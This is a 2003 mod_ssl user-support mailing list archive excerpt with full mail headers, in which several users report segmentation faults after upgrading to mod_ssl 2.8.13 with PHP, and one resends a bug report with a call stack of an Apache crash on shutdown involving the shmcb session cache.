Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 18 20:28:30 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 90D2A2AA035; Tue, 18 Mar 2003 20:28:30 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from enroque.rawbyte.com (adsl-63-192-218-231.dsl.snfc21.pacbell.net [63.192.218.231])
	by master.modssl.org (Postfix) with ESMTP id 1E9F22AA015
	for ; Tue, 18 Mar 2003 20:28:29 +0100 (CET)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id D4ED93209F; Tue, 18 Mar 2003 11:35:35 -0800 (PST)
Date: Tue, 18 Mar 2003 11:35:35 -0800
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: Apache 2.x SSL failing -- "no listening sockets available, shutting down"
Message-ID: <20030318193535.GA11073@rawbyte.com>
References: <20030313174654.54458.qmail@web10508.mail.yahoo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20030313174654.54458.qmail@web10508.mail.yahoo.com>
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


> Hello, I have attempted several times on 2 platforms to install and run
Apache  > SSL. Linux PPC and Linux Redhat8.0
[...]
> I wondered, of course, if some mod_ssl package is requried in the mod
> structure,  but found no documentation for Apache 2.x to that effect anywhere I
> looked.

Take a look at 
http://www.apacheworld.org/ty24/, in the secure server chapter for detailed
instructions on how to get Apache 2 working with SSL

Cheers

Daniel
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar 19 15:39:45 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5F4CC2AA049; Wed, 19 Mar 2003 15:39:45 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from olympos.ccf.auth.gr (olympos.ccf.auth.gr [155.207.112.1])
	by master.modssl.org (Postfix) with ESMTP id 456152AA01A
	for ; Wed, 19 Mar 2003 15:39:41 +0100 (CET)
Received: from ccf.auth.gr (afrodite.ccf.auth.gr [155.207.112.23])
	(authenticated bits=0)
	by olympos.ccf.auth.gr (8.12.8/8.12.8) with ESMTP id h2JEdPMr002986
	(version=TLSv1/SSLv3 cipher=RC4-MD5 bits=128 verify=NOT)
	for ; Wed, 19 Mar 2003 16:39:29 +0200 (EET)
Message-ID: <3E78811C.699E4E4B@ccf.auth.gr>
Date: Wed, 19 Mar 2003 16:39:25 +0200
From: Sophia Petridou 
Organization: Network Operation Center, AUTh
X-Mailer: Mozilla 4.8 [en] (Windows NT 5.0; U)
X-Accept-Language: el,en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: mod_ssl/2.8.13 and php
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms4178B99D58E33B262AE62B2E"
X-Virus-Scanned: by olympos.ccf.auth.gr. Virus data file v4252 created Mar 12 2003
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sophia Petridou 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms4178B99D58E33B262AE62B2E
Content-Type: text/plain; charset=iso-8859-7
Content-Transfer-Encoding: 7bit

Hello all,

SERVER: Apache 1.3.27 + mod_ssl/2.8.13 + PHP/4.3.1

I have just installed mod_ssl/2.8.13 and my server
has started without problems.
(config command: ./configure  --with-apxs=/usr/local/apache/bin/apxs
--with-ssl=/usr/local/ssl --with-mm=/usr/local/include)

The requests about html files or server-status and server-info pages
are ok. But, when I request a php file (/php3-info.php3) I get the
message
'The page cannot be displayed'. These are the entries in my error log
file:
[Wed Mar 19 16:10:31 2003] [notice] child pid 11411 exit signal
Segmentation Fault (11)
[Wed Mar 19 16:10:33 2003] [notice] child pid 11414 exit signal
Segmentation Fault (11)
[Wed Mar 19 16:20:54 2003] [notice] child pid 11413 exit signal
Segmentation Fault (11)
[Wed Mar 19 16:21:04 2003] [notice] child pid 11415 exit signal
Segmentation Fault (11)
[Wed Mar 19 16:21:17 2003] [notice] child pid 11412 exit signal
Segmentation Fault (11)

This problem does not exist with mod_ssl/2.8.12 and the same version of
php

thanks in advance

-sophia


--------------ms4178B99D58E33B262AE62B2E
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIIPEgYJKoZIhvcNAQcCoIIPAzCCDv8CAQExCzAJBgUrDgMCGgUAMAsGCSqGSIb3DQEHAaCC
DK0wggYbMIIFA6ADAgECAgUBAAAADTANBgkqhkiG9w0BAQQFADCByDELMAkGA1UEBhMCR1Ix
LTArBgNVBAoTJEFyaXN0b3RsZSBVbml2ZXJzaXR5IG9mIFRoZXNzYWxvbmlraTEpMCcGA1UE
CxMgQ2VudHJhbCBDb21tdW5pY2F0aW9uIEZhY2lsaXRpZXMxNDAyBgNVBAMTK0FVVEggTm9j
IFVzZXJzIENlcnRpZmljYXRpb24gQXV0aG9yaXR5IDIwMDMxKTAnBgkqhkiG9w0BCQEWGm5v
Y3VzZXJzY2EyMDAzQGNjZi5hdXRoLmdyMB4XDTAzMDEyMjAwMDAwMFoXDTA0MDEyMTIzNTk1
OVowgaYxCzAJBgNVBAYTAkdSMS0wKwYDVQQKEyRBcmlzdG90bGUgVW5pdmVyc2l0eSBvZiBU
aGVzc2Fsb25pa2kxKTAnBgNVBAsTIENlbnRyYWwgQ29tbXVuaWNhdGlvbiBGYWNpbGl0aWVz
MRgwFgYDVQQDEw9Tb3BoaWEgUGV0cmlkb3UxIzAhBgkqhkiG9w0BCQEWFHNwZXRyaWRvQGNj
Zi5hdXRoLmdyMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC2NedY3VwKoMWWtG5toO40
O2o9vrw1r4upJr4aL0EH9+vE8+BIgCROggO+Lw5fLUomoQW3qnnJFrT4mz9Lu7R8jjxx1VLi
B2rfX3x7DIN1a5hDTXNNrMGOnQDCwnCPhKpyarpO9CsNK59Ttdu/sy0ByUGplkmbCDi+AaQo
GT4RvwIDAQABo4ICrjCCAqowDAYDVR0TAQH/BAIwADARBglghkgBhvhCAQEEBAMCBaAwDgYD
VR0PAQH/BAQDAgXgMB0GA1UdDgQWBBTliUZt1gz0A6fBRNoPvLJgR6B9mDCBxAYDVR0jBIG8
MIG5gBTCkOKB+mQJxDKdYGzsJA/aHg95OaGBmaSBljCBkzELMAkGA1UEBhMCR1IxLTArBgNV
BAoTJEFyaXN0b3RsZSBVbml2ZXJzaXR5IG9mIFRoZXNzYWxvbmlraTEpMCcGA1UECxMgQ2Vu
dHJhbCBDb21tdW5pY2F0aW9uIEZhY2lsaXRpZXMxKjAoBgNVBAMTIVJvb3QgQ2VydGlmaWNh
dGlvbiBBdXRob3JpdHkgMjAwMYIFAQAAAAcwHwYDVR0RBBgwFoEUc3BldHJpZG9AY2NmLmF1
dGguZ3IwJQYDVR0SBB4wHIEabm9jdXNlcnNjYTIwMDNAY2NmLmF1dGguZ3IwQQYDVR0fBDow
ODA2oDSgMoYwaHR0cDovL3d3dy5hdXRoLmdyL0NBL25vY3VzZXJzMjAwMy9jcmx2MS5kZXIu
Y3JsMIIBBAYDVR0gBIH8MIH5MIH2BgsrBgEEAbwdAgIBATCB5jAsBggrBgEFBQcCARYgaHR0
cDovL3d3dy5hdXRoLmdyL0NBL0NQU3YxLmh0bWwwgbUGCCsGAQUFBwICMIGoMDQWLUFyaXN0
b3RsZSBVbml2ZXJzaXR5IE5ldHdvcmsgT3BlcmF0aW9uIENlbnRlcjADAgEBGnBUaGlzIGNl
cnRpZmljYXRlIGlzIHN1YmplY3QgdG8gR3JlZWsgbGF3cyBhbmQgb3VyIENQUy4gVGhpcyBD
ZXJ0aWZpY2F0ZSBtdXN0IG9ubHkgYmUgdXNlZCBmb3IgYWNhZGVtaWMgcHVycG9zZXMuMA0G
CSqGSIb3DQEBBAUAA4IBAQAPTSmZWYZD79UmL43CAdhG9PhB0J33lY41i+XjSsVRSTkyS7ei
YvEgifiogF5CNjzmqboRbWauEtXLvtB/BWY4oDyXjcM5PQw7IhAgqRQeGT5nHYHlfr6jNChS
n21JKJwP+9H4a9BIdHRq1Oqnmst7AI4D/IsyxpANrINTNp196lTbYmaedxCyk0uuSHu9Q1gl
DCrSr510WVAwi6GldbwYwFnTGAZjiUL7I1yYNWuU1OVFsZqbQEWWoXKIPMH8W7LS/17UW00+
YtihMp075xtipxnrKfSvsiVMMI2ecXpWcxzoj/oILeVhMYjC7GvQd4aFpKj6nnIsQOAme8Fi
P0wrMIIGijCCBXKgAwIBAgIFAQAAAAcwDQYJKoZIhvcNAQEEBQAwgZMxCzAJBgNVBAYTAkdS
MS0wKwYDVQQKEyRBcmlzdG90bGUgVW5pdmVyc2l0eSBvZiBUaGVzc2Fsb25pa2kxKTAnBgNV
BAsTIENlbnRyYWwgQ29tbXVuaWNhdGlvbiBGYWNpbGl0aWVzMSowKAYDVQQDEyFSb290IENl
cnRpZmljYXRpb24gQXV0aG9yaXR5IDIwMDEwHhcNMDMwMTE3MTMzMDA2WhcNMDUwMTE2MTMz
MDA2WjCByDELMAkGA1UEBhMCR1IxLTArBgNVBAoTJEFyaXN0b3RsZSBVbml2ZXJzaXR5IG9m
IFRoZXNzYWxvbmlraTEpMCcGA1UECxMgQ2VudHJhbCBDb21tdW5pY2F0aW9uIEZhY2lsaXRp
ZXMxNDAyBgNVBAMTK0FVVEggTm9jIFVzZXJzIENlcnRpZmljYXRpb24gQXV0aG9yaXR5IDIw
MDMxKTAnBgkqhkiG9w0BCQEWGm5vY3VzZXJzY2EyMDAzQGNjZi5hdXRoLmdyMIIBIjANBgkq
hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAn66s2lErvnV9LCcBkrnk+SHe9lGDXGXQMgnmg5Ys
1UugC2UEdN2EBb16gcLGnhqDvKf8IEbIfVp4kTClGON4g2Dumkfqged07sOTpPhMdATbcZ+6
PSAnltpX1xs7OA5wvBvJJHRhguSdCYFsC3fipWzmgvgmBQOZybyp/maQtGocOT8jmnStPQAR
KZPO05WHVNY94xb7tUrQxT0Or2HmQD1aRUc+1PnRIkXBOprD5KoZ432bCb9ubdzaCH+j9fb7
kYTHSKYr2U2T3zTFBGZwtfz8TqZ+n7HpRInOwCdITMxb79bzYbj90Xvdqq3r3LsBvDAYLbnE
kCCMbAFZWgf3/wIDAQABo4ICrDCCAqgwEgYDVR0TAQH/BAgwBgEB/wIBADALBgNVHQ8EBAMC
AQYwEQYJYIZIAYb4QgEBBAQDAgAHMB0GA1UdDgQWBBTCkOKB+mQJxDKdYGzsJA/aHg95OTCB
wAYDVR0jBIG4MIG1gBQz5TBgiVRronFpRSFqG2cC+TNJ4KGBmaSBljCBkzELMAkGA1UEBhMC
R1IxLTArBgNVBAoTJEFyaXN0b3RsZSBVbml2ZXJzaXR5IG9mIFRoZXNzYWxvbmlraTEpMCcG
A1UECxMgQ2VudHJhbCBDb21tdW5pY2F0aW9uIEZhY2lsaXRpZXMxKjAoBgNVBAMTIVJvb3Qg
Q2VydGlmaWNhdGlvbiBBdXRob3JpdHkgMjAwMYIBADAlBgNVHREEHjAcgRpub2N1c2Vyc2Nh
MjAwM0BjY2YuYXV0aC5ncjAhBgNVHRIEGjAYgRZyb290Y2EyMDAxQGNjZi5hdXRoLmdyMD0G
A1UdHwQ2MDQwMqAwoC6GLGh0dHA6Ly93d3cuYXV0aC5nci9DQS9yb290MjAwMS9jcmx2MS5k
ZXIuY3JsMIIBBQYDVR0gBIH9MIH6MIH3BgwrBgEEAbwdAgEBAQEwgeYwLAYIKwYBBQUHAgEW
IGh0dHA6Ly93d3cuYXV0aC5nci9DQS9DUFN2MS5odG1sMIG1BggrBgEFBQcCAjCBqDA0Fi1B
cmlzdG90bGUgVW5pdmVyc2l0eSBOZXR3b3JrIE9wZXJhdGlvbiBDZW50ZXIwAwIBARpwVGhp
cyBjZXJ0aWZpY2F0ZSBpcyBzdWJqZWN0IHRvIEdyZWVrIGxhd3MgYW5kIG91ciBDUFMuIFRo
aXMgQ2VydGlmaWNhdGUgbXVzdCBvbmx5IGJlIHVzZWQgZm9yIGFjYWRlbWljIHB1cnBvc2Vz
LjANBgkqhkiG9w0BAQQFAAOCAQEAMVIuv6l/Uaz6xrXH6YVBWK5+ss6PfCJ8uQVGDrXXpt5A
+teipdONMeq9ApuY5cM78jcqJI/X5bq72AT/M0v/LU+MqwBTudWzykUO5Mu54gcsQuutMsiu
+5CcmTrbQr58C+BaIez2FUdTgewMbS7WsnG3BS28EhtSvKs8d7EVyRJkj+rbNCzcTi1qq/1T
A3APGnK2wVqjyS3l4JbhTSJN3RUTXH9OTr+lx7aHvX51YAnaMVGJprN/fsvl0+tP14Bx10Cr
HduRoqeCQfXe60KTWnf6p86+DNocGCVxlq7aUafeXj7U8xoqSL7/5Phj/XZWCTHqYKPKSRLQ
Jj7Z54DEcTGCAi0wggIpAgEBMIHSMIHIMQswCQYDVQQGEwJHUjEtMCsGA1UEChMkQXJpc3Rv
dGxlIFVuaXZlcnNpdHkgb2YgVGhlc3NhbG9uaWtpMSkwJwYDVQQLEyBDZW50cmFsIENvbW11
bmljYXRpb24gRmFjaWxpdGllczE0MDIGA1UEAxMrQVVUSCBOb2MgVXNlcnMgQ2VydGlmaWNh
dGlvbiBBdXRob3JpdHkgMjAwMzEpMCcGCSqGSIb3DQEJARYabm9jdXNlcnNjYTIwMDNAY2Nm
LmF1dGguZ3ICBQEAAAANMAkGBSsOAwIaBQCggbEwGAYJKoZIhvcNAQkDMQsGCSqGSIb3DQEH
ATAcBgkqhkiG9w0BCQUxDxcNMDMwMzE5MTQzOTI1WjAjBgkqhkiG9w0BCQQxFgQUYlCzad4X
zFoNZwpon/X/oOttKJIwUgYJKoZIhvcNAQkPMUUwQzAKBggqhkiG9w0DBzAOBggqhkiG9w0D
AgICAIAwBwYFKw4DAgcwDQYIKoZIhvcNAwICAUAwDQYIKoZIhvcNAwICASgwDQYJKoZIhvcN
AQEBBQAEgYBs85CKkTZOMdh2cL939FrnNzanqSZucQB0LtXJCmnsBU+F7bq7VQLqwrtBGevN
0338wv5LAo2CnHGZTJLIwqbVOHnjR2yb5MLwjB259yM6iAvRn+9Ufqcmd82zKk/YZo6RKq7x
YbUi3S2u8x0bT7EomVWTZKOEBCilvcNAx4xF6w==
--------------ms4178B99D58E33B262AE62B2E--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar 19 15:59:59 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CAACC2AA049; Wed, 19 Mar 2003 15:59:59 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from NOCA.fiwc.navy.mil (noca.fiwc.navy.mil [204.37.10.8])
	by master.modssl.org (Postfix) with ESMTP id 1629D2AA01A
	for ; Wed, 19 Mar 2003 15:59:58 +0100 (CET)
Received: (from uucp@localhost)
	by NOCA.fiwc.navy.mil (8.11.6+Sun/8.11.6) id h2JEvv820858
	for ; Wed, 19 Mar 2003 14:57:57 GMT
Received: from mail370.fiwc.navy.mil(204.37.13.47) by NOCA.fiwc.navy.mil via csmap (V6.0)
	id srcAAAziaiVO; Wed, 19 Mar 03 14:57:57 GMT
content-class: urn:content-classes:message
Subject: RE: mod_ssl/2.8.13 and php
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-7"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Date: Wed, 19 Mar 2003 10:04:36 -0500
Message-ID: <84431D6C40F14941BB4D7007339E691DB67DDA@mail370.AD.FIWC.NAVY.MIL>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: mod_ssl/2.8.13 and php
Thread-Index: AcLuJh5BUC3Cj/GXQBqCH9K88gSMyQAAph+Q
From: "Frye, David" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Frye, David" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I had the same problem but without using PHP.  Ended up reverting back =
to 2.8.12 until I (or someone else) can figure it out.  It will also =
install the snakeoil certificates even if I specifiy the path to an =
existing cert.

-----Original Message-----
From: Sophia Petridou [mailto:spetrido@ccf.auth.gr]
Sent: Wednesday, March 19, 2003 9:39 AM
To: modssl-users@modssl.org
Subject: mod_ssl/2.8.13 and php


Hello all,

SERVER: Apache 1.3.27 + mod_ssl/2.8.13 + PHP/4.3.1

I have just installed mod_ssl/2.8.13 and my server
has started without problems.
(config command: ./configure  --with-apxs=3D/usr/local/apache/bin/apxs
--with-ssl=3D/usr/local/ssl --with-mm=3D/usr/local/include)

The requests about html files or server-status and server-info pages
are ok. But, when I request a php file (/php3-info.php3) I get the
message
'The page cannot be displayed'. These are the entries in my error log
file:
[Wed Mar 19 16:10:31 2003] [notice] child pid 11411 exit signal
Segmentation Fault (11)
[Wed Mar 19 16:10:33 2003] [notice] child pid 11414 exit signal
Segmentation Fault (11)
[Wed Mar 19 16:20:54 2003] [notice] child pid 11413 exit signal
Segmentation Fault (11)
[Wed Mar 19 16:21:04 2003] [notice] child pid 11415 exit signal
Segmentation Fault (11)
[Wed Mar 19 16:21:17 2003] [notice] child pid 11412 exit signal
Segmentation Fault (11)

This problem does not exist with mod_ssl/2.8.12 and the same version of
php

thanks in advance

-sophia

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar 19 18:00:10 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B80A12AA049; Wed, 19 Mar 2003 18:00:10 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hotmail.com (bay2-f103.bay2.hotmail.com [65.54.247.103])
	by master.modssl.org (Postfix) with ESMTP id 9FC2C2AA01A
	for ; Wed, 19 Mar 2003 18:00:07 +0100 (CET)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Wed, 19 Mar 2003 08:58:46 -0800
Received: from 156.153.254.2 by by2fd.bay2.hotmail.msn.com with HTTP;
	Wed, 19 Mar 2003 16:58:46 GMT
X-Originating-IP: [156.153.254.2]
X-Originating-Email: [ed_l_wong@hotmail.com]
From: "Edward Wong" 
To: modssl-users@modssl.org
Subject: Re: shmcb access violation with openssl 0.9.6i
Date: Wed, 19 Mar 2003 08:58:46 -0800
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 19 Mar 2003 16:58:46.0437 (UTC) FILETIME=[CE2C1550:01C2EE38]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Edward Wong" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is so bizzaire....  I sent this e-mail out a few weeks ago.  I have no 
idea why it got sent out again.  Please disregard this message.

--Ed




>From: "WONG,ED (HP-Boise,ex1)" 
>Reply-To: modssl-users@modssl.org
>To: "'modssl-users@modssl.org'" 
>Subject: shmcb access violation with openssl 0.9.6i
>Date: Mon, 3 Mar 2003 15:16:27 -0500 MIME-Version: 1.0
>Received: from mc9-f11.bay6.hotmail.com ([65.54.166.18]) by 
>mc9-s7.bay6.hotmail.com with Microsoft SMTPSVC(5.0.2195.5600); Tue, 18 Mar 
>2003 06:47:14 -0800
>Received: from mmx.engelschall.com ([195.27.130.252]) by 
>mc9-f11.bay6.hotmail.com with Microsoft SMTPSVC(5.0.2195.5600); Tue, 18 Mar 
>2003 06:47:13 -0800
>Received: by mmx.engelschall.com (Postfix)id 5C84E19390; Tue, 18 Mar 2003 
>15:45:23 +0100 (CET)
>Received: from master.modssl.org (unknown [195.27.176.156])by 
>mmx.engelschall.com (Postfix) with ESMTP id 3223519388for 
>; Tue, 18 Mar 2003 15:45:23 +0100 
>(CET)
>Received: by master.modssl.org (Postfix)id E2DA42AA04B; Tue, 18 Mar 2003 
>15:45:25 +0100 (CET)
>Received: by master.modssl.org (Postfix, from userid 4003)id CF36C2AA04A; 
>Tue, 18 Mar 2003 15:45:25 +0100 (CET)
>Received: by master.modssl.org (Postfix, from userid 4000)id 6B2AB2AA020; 
>Tue, 18 Mar 2003 15:45:25 +0100 (CET)
>Received: from atlrel8.hp.com (atlrel8.hp.com [156.153.255.206])by 
>master.modssl.org (Postfix) with ESMTP id C10872AA015for 
>; Mon,  3 Mar 2003 21:16:35 +0100 (CET)
>Received: from xatlrelay1.atl.hp.com (xatlrelay1.atl.hp.com 
>[15.45.89.190])by atlrel8.hp.com (Postfix) with ESMTP id B141F1C00EF9for 
>; Mon,  3 Mar 2003 15:16:33 -0500 (EST)
>Received: from xatlbh4.atl.hp.com (xatlbh4.atl.hp.com [15.45.89.189])by 
>xatlrelay1.atl.hp.com (Postfix) with ESMTP id 84B5A1C000BEfor 
>; Mon,  3 Mar 2003 15:16:33 -0500 (EST)
>Received: by xatlbh4.atl.hp.com with Internet Mail Service (5.5.2655.55)id 
>; Mon, 3 Mar 2003 15:16:33 -0500
>X-Message-Info: 820stLNiepR2PyHkKYPO1lJ65qO6/JF5
>Delivered-To: modssl-users-l@master.modssl.org
>X-Original-To: modssl-users@modssl.org
>Delivered-To: modssl-users@modssl.org
>X-Original-To: modssl-users@modssl.org
>Message-ID: <25C4C6009B5BD5118FF30003470BF7F507DDC175@xboi04.boi.hp.com>
>X-Mailer: Internet Mail Service (5.5.2655.55)
>Sender: owner-modssl-users@modssl.org
>Precedence: bulk
>X-Sender: "WONG,ED (HP-Boise,ex1)" 
>X-List-Manager: Majordomo [version 1.94.5]
>X-List-Name: modssl-users
>Return-Path: owner-mmx-modssl-users@mmx.engelschall.com
>X-OriginalArrivalTime: 18 Mar 2003 14:47:14.0245 (UTC) 
>FILETIME=[43A56750:01C2ED5D]
>
>Hello All,
>
>I've been able to consistantly reproduce a GPF on Apache service shutdown
>using Openssl 0.9.6i, and Apache 2.0.44.
>
>Swapping to an older version of Openssl (0.9.6g) resolved the GPF.
>
>To reproduce, simply download and build OpenSSL 0.9.6i and Apache 2.0.44.
>Be sure to configure ssl to use the shmcb ssl session caching.  Launch
>apache as a service and browse to the server using SSL.  Then try to stop
>the apache service.  During shutdown, Apache will GPF.
>
>Oddly, if you don't browse to the webserver using SSL, Apache will not GPF
>on shutdown.
>
>If it helps, the call stack looks as follows:
>
>NTDLL! 77f51baa()
>NTDLL! 77f7561d()
>apr_file_write(apr_file_t * 0x005e91c8, const void * 0x0006dd6c, unsigned
>int * 0x0006dd58) line 316
>apr_file_puts(const char * 0x0006dd6c, apr_file_t * 0x005e91c8) line 441
>log_error_core(const char * 0x6fd1d948, int 117, int 4, int 720006, const
>server_rec * 0x00602700, const request_rec * 0x00000000, apr_pool_t *
>0x00000000, const char * 0x6fd1d924, char * 0x0006fdd0) line 543
>ap_log_error(const char * 0x6fd1d948, int 117, int 4, int 720006, const
>server_rec * 0x00602700, const char * 0x6fd1d924) line 561 + 37 bytes
>ssl_mutex_on(server_rec * 0x00602700) line 118 + 28 bytes
>ssl_scache_shmcb_remove(server_rec * 0x00602700, unsigned char * 
>0x00689dd8,
>int 32) line 476 + 9 bytes
>ssl_scache_remove(server_rec * 0x00602700, unsigned char * 0x00689dd8, int
>32) line 158 + 17 bytes
>ssl_callback_DelSessionCacheEntry(ssl_ctx_st * 0x00645240, ssl_session_st *
>0x00689d90) line 1722 + 17 bytes
>timeout(ssl_session_st * 0x00689d90, timeout_param_st * 0x0006fe6c) line 
>602
>+ 18 bytes
>lh_doall_arg(lhash_st * 0x006453d0, void (void)* 0x1001a516
>timeout(ssl_session_st *, timeout_param_st *), void * 0x0006fe6c) line 290 
>+
>13 bytes
>SSL_CTX_flush_sessions(ssl_ctx_st * 0x00645240, long 0) line 619 + 18 bytes
>SSL_CTX_free(ssl_ctx_st * 0x00645240) line 1259 + 11 bytes
>ssl_init_ctx_cleanup(modssl_ctx_t * 0x0064ef68) line 1197 + 21 bytes
>ssl_init_ctx_cleanup_server(modssl_ctx_t * 0x0064ef68) line 1213 + 9 bytes
>ssl_init_ModuleKill(void * 0x0030c458) line 1249 + 12 bytes
>run_cleanups(cleanup_t * * 0x0030a5d0) line 1976 + 13 bytes
>apr_pool_destroy(apr_pool_t * 0x0030a5c0) line 755 + 12 bytes
>apr_pool_destroy(apr_pool_t * 0x00308588) line 752 + 12 bytes
>destroy_and_exit_process(process_rec * 0x00308618, int 0) line 247
>main(int 3, const char * const * 0x003024a8) line 658 + 11 bytes
>mainCRTStartup() line 338 + 17 bytes
>KERNEL32! 77e814c7()
>
>The error in log_error_core is:
>[Mon Mar 03 12:43:04 2003] [warn] (OS 6)The handle is invalid.  : Failed to
>acquire global mutex lock.
>
>Is this a known issue?  Is there something that I'm missing?  Other than
>changing from DBM to SHMCB, I have stock conf files.
>
>Thanks in Advance,
>
>************************************
>Edward Wong
>Connectivity Software Engineer
>
>
>Hewlett-Packard Company
>************************************
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org


_________________________________________________________________
The new MSN 8: smart spam protection and 2 months FREE*  
http://join.msn.com/?page=features/junkmail

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 20 12:34:09 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5FBF62AA049; Thu, 20 Mar 2003 12:34:09 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from fyi.jobware.net (fyi.jobware.net [80.66.0.154])
	by master.modssl.org (Postfix) with ESMTP id C22862AA015
	for ; Thu, 20 Mar 2003 12:34:03 +0100 (CET)
Received: from lotus.jobware.net (guardian.jobware.net [80.66.7.98])
	by fyi.jobware.net (8.12.8/8.12.8) with ESMTP id h2KBXt1B015093
	for ; Thu, 20 Mar 2003 12:33:55 +0100
Received: from lotus.jobware.net (localhost [127.0.0.1])
	by lotus.jobware.net (8.12.8/8.12.8) with ESMTP id h2KBXtOw024010
	for ; Thu, 20 Mar 2003 12:33:55 +0100
Received: from localhost (burkhard@localhost)
	by lotus.jobware.net (8.12.8/8.12.8/Submit) with ESMTP id h2KBXtoQ024007
	for ; Thu, 20 Mar 2003 12:33:55 +0100
Date: Thu, 20 Mar 2003 12:33:55 +0100 (CET)
From: Burkhard Ulrich 
To: modssl-users@modssl.org
Subject: RE: mod_ssl/2.8.13 and php
In-Reply-To: <84431D6C40F14941BB4D7007339E691DB67DDA@mail370.AD.FIWC.NAVY.MIL>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Burkhard Ulrich 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I have this Problems with:

Apache/1.3.27 mod_gzip/1.3.26.1a PHP/4.3.1 mod_ssl/2.8.13 OpenSSL/0.9.7a

Requesting Pages without ssl encryption works fine but requesting this
Pages with encryption causes segfault on every request.

There are no Problems with  2.8.12

Regards

Burkhard


On Wed, 19 Mar 2003, Frye, David wrote:

> I had the same problem but without using PHP.  Ended up reverting back to 2.8.12 until I (or someone else) can figure it out.  It will also install the snakeoil certificates even if I specifiy the path to an existing cert.
> 
> -----Original Message-----
> From: Sophia Petridou [mailto:spetrido@ccf.auth.gr]
> Sent: Wednesday, March 19, 2003 9:39 AM
> To: modssl-users@modssl.org
> Subject: mod_ssl/2.8.13 and php
> 
> 
> Hello all,
> 
> SERVER: Apache 1.3.27 + mod_ssl/2.8.13 + PHP/4.3.1
> 
> I have just installed mod_ssl/2.8.13 and my server
> has started without problems.
> (config command: ./configure  --with-apxs=/usr/local/apache/bin/apxs
> --with-ssl=/usr/local/ssl --with-mm=/usr/local/include)
> 
> The requests about html files or server-status and server-info pages
> are ok. But, when I request a php file (/php3-info.php3) I get the
> message
> 'The page cannot be displayed'. These are the entries in my error log
> file:
> [Wed Mar 19 16:10:31 2003] [notice] child pid 11411 exit signal
> Segmentation Fault (11)
> [Wed Mar 19 16:10:33 2003] [notice] child pid 11414 exit signal
> Segmentation Fault (11)
> [Wed Mar 19 16:20:54 2003] [notice] child pid 11413 exit signal
> Segmentation Fault (11)
> [Wed Mar 19 16:21:04 2003] [notice] child pid 11415 exit signal
> Segmentation Fault (11)
